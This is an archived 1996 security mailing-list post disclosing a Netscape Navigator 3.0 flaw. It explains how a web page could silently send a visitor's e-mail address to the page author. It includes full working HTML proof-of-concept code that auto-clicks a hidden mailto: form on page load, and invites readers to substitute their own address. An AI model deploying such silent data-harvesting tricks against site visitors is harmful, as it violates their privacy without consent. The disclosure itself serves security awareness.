[3921] in WWW Security List Archive
One more reason to upgrade your navigator
daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Sun Dec 29 22:50:23 1996
From: htorgema@novice.uwaterloo.ca
Date: Sun, 29 Dec 1996 20:36:10 -0500 (EST)
To: www-security@ns2.rutgers.edu
In-Reply-To: <01BBF3F2.9ED9F520@silicon.geocel.com>
Errors-To: owner-www-security@ns2.rutgers.edu
Warning: On-topic message!
With Netscape Navigator 3.0, it is possible to grab
automatically and silently the e-mail addresses of each
client coming to a page.
It was already known that when a form is submitted with
method="get", enctype="text/plain" and action="mailto:..",
no warning dialog box is shown.
The next step is to submit automatically the form.
But Netscape put some security restrictions:
Javascript usually allows to automatically submit a form
with the submit() method, but this doesn't work when the
action contain a mailto: url.
However, you can emulate a mouse click on the submit button
with another method: click()...
Here's a working HTML code:
<HTML>
<HEAD>
<TITLE> How to grab an e-mail address
</TITLE>
</HEAD>
<BODY onload= "document.forms[0].elements[1].click()">
<FORM method= get
enctype="text/plain"
action= "mailto:henri.torgemane@etu.utc.fr?subject=Big bug">
<INPUT type= "hidden"
name= "It's time to upgrade to "
value= "> Netscape 3.01">
<INPUT type= submit
value= "">
</FORM>
</BODY>
</HTML>
The only unusual line is the <BODY> line:
the onload parameter tell to the navigator to execute the javascript
command that follows.
document.forms[0].elements[1].click()
tells the browser to emulate a click on the second element of the first
form of the current document.
(the first element is an hidden tag, the second is the submit button)
I tested this only on Netscape 3.0 for AIX.
It's very likely to work on any other versions of Netscape 3.0
I don't know how it works with Netscape 3.01...
Henri.
PS: You should change the mailto: url with your own address..
---------------
Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
Never let your sense of morals prevent you from doing what is right.
-- Salvor Hardin, "Foundation"
